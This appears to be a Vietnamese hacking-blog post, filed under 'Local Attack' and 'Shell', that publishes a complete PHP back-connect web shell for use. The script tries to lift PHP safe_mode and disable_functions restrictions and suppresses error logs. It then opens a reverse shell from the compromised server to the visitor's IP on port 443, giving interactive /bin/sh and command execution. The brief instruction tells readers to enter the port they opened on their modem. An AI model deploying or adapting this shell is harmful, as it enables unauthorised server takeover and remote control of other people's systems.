• About
  • Policy
  • Contact

Phan Anh Buổi Sáng

  • Home
  • Kiến thức IT
    • PSD
    • Blogger
  • Translate
Google
Custom Search
Trang chủ » Code » Local Attack » Shell » dc çift baðlantý script shell

dc çift baðlantý script shell

Unknown Labels: Code, Local Attack, Shell Leave A Comment 21:10
443 yazan yere modeminizde açtýðýnýz açýk portu yazýn

Code:
<?
@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
?>
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<meta http-equiv=Content-Type content="text/html; charset=windows-1254">
</HEAD>
<BODY>
<CENTER>
<?php
$uname = php_uname();
echo "Uname -a :$uname";
?>
<br><br>
<a href="?BackConnect=PHP_1">PHP BackConnect 1</a>
&nbsp;&nbsp; <a href="?BackConnect=PHP_2">PHP BackConnect 2</a>
<?php
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
$bc = $_GET["BackConnect"];
switch($bc){
case "PHP_1":

set_time_limit (0);
$VERSION = "1.0";
$ip = $_SERVER["REMOTE_ADDR"];
$port = 443;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {

$pid = pcntl_fork();

if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}

if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}

$daemon = 1;
} else {
print("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}

// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}

// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}

// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}

// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}

// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
break;
case "PHP_2":
$ipim=$_SERVER["REMOTE_ADDR"];
$portum="443";
if ($ipim <> "")
{
$mucx=fsockopen($ipim , $portum , $errno, $errstr );
if (!$mucx){
$result = "Error: didnt connect !!!";
}
else {

$zamazing0="\n";
fputs ($mucx ,"\nwelcome ZoRBaCK\n\n");
fputs($mucx , system("uname -a") .$zamazing0 );
fputs($mucx , system("pwd") .$zamazing0 );
fputs($mucx , system("id") .$zamazing0.$zamazing0 );
while(!feof($mucx)){
fputs ($mucx);
$one="[$";
$two="]";
$result= fgets ($mucx, 8192);
$message=`$result`;
fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n");
}
fclose ($mucx);
}
}

break;

}
?>
</CENTER>
</BODY>
</HTML>

Bài viết liên quan

← Bài đăng mới hơn Bài đăng cũ hơn → Trang chủ
Powered by Blogger.

Các Bình Luận Gần Đây

Bài đăng phổ biến

  • Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Đôi lúc em tránh ánh mắt của anh. vì dường như lúc nào em cũng hiểu thấu lòng anh Demo Cover Download PSD loading...
  • 10 tên tội phạm máy tính từng "làm khổ" cả thế giới (phần 1)
    Ngay từ những ngày đầu tiên khi những chiếc máy tính ra đời từ cách đây hơn 50 năm, một loại tội phạm mới cũng theo đó mà xuất hiện: tội p...
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • Vài Ảnh Tết Chế
    LIÊN HỆ
  • PSD - Người & Ta
    DOWNLOAD PSD
  • Mp3.zing.vn XSS Vulnerability - Zing Mp3 dính lỗ hổng bảo mật XSS
    Mp3.zing.vn XSS Vulnerability Link: /tim-kiem/bai-hat.html
  • Hệ Thống AutoBot Like Facebook - DucFly.Net | Tiến Đức Blog
    Sever : DucFly.Net 🍁 🙍  Chính Thức Open Hệ Thống AutoBot  😽   DucFly.Net   🐾  Ngày 20/11/2016 Ngày Đẹp Luôn  👄   🍁 🙍  Hệ Thống Hoàn ...
  • Wget Config TooL
    Code: <body><title> Wget Config TooL - C0d3d By Red-D3v1L </title></body> <br>C0d3d By Red-D3v1L</br> ...
  • [SHARE] TUT xóa thông tin tài khoản garena 2016 - Zoy Thủ Thuật #Zoy
    Hello mọi người , Mình là Ken ! Hôm nay mình sẽ chia sẽ cho các bạn 1 thủ thuật cực mới, cách để xóa thông tin garena 1 cách cực kì nhanh ch...
  • Xem file config = SQL injection

Pageviews from the past week

Chuyên mục

Bài đăng phổ biến

  • Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Đôi lúc em tránh ánh mắt của anh. vì dường như lúc nào em cũng hiểu thấu lòng anh Demo Cover Download PSD loading...
  • 10 tên tội phạm máy tính từng "làm khổ" cả thế giới (phần 1)
    Ngay từ những ngày đầu tiên khi những chiếc máy tính ra đời từ cách đây hơn 50 năm, một loại tội phạm mới cũng theo đó mà xuất hiện: tội p...
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • Vài Ảnh Tết Chế
    Vài Ảnh Tết Chế
    LIÊN HỆ
  • PSD - Người & Ta
    PSD - Người & Ta
    DOWNLOAD PSD
  • Mp3.zing.vn XSS Vulnerability - Zing Mp3 dính lỗ hổng bảo mật XSS
    Mp3.zing.vn XSS Vulnerability - Zing Mp3 dính lỗ hổng bảo mật XSS
    Mp3.zing.vn XSS Vulnerability Link: /tim-kiem/bai-hat.html
  • Hệ Thống AutoBot Like Facebook - DucFly.Net | Tiến Đức Blog
    Hệ Thống AutoBot Like Facebook - DucFly.Net | Tiến Đức Blog
    Sever : DucFly.Net 🍁 🙍  Chính Thức Open Hệ Thống AutoBot  😽   DucFly.Net   🐾  Ngày 20/11/2016 Ngày Đẹp Luôn  👄   🍁 🙍  Hệ Thống Hoàn ...
  • Wget Config TooL
    Code: <body><title> Wget Config TooL - C0d3d By Red-D3v1L </title></body> <br>C0d3d By Red-D3v1L</br> ...
  • [SHARE] TUT xóa thông tin tài khoản garena 2016 - Zoy Thủ Thuật #Zoy
    [SHARE] TUT xóa thông tin tài khoản garena 2016 - Zoy Thủ Thuật #Zoy
    Hello mọi người , Mình là Ken ! Hôm nay mình sẽ chia sẽ cho các bạn 1 thủ thuật cực mới, cách để xóa thông tin garena 1 cách cực kì nhanh ch...
  • Xem file config = SQL injection
    Xem file config = SQL injection
Google
Custom Search
Support: Facebook | Twitter | Google+ | Giới thiệu
Copyright © 2015 • Phan Anh Buổi Sáng • All Right Reserved. Template by Template Việt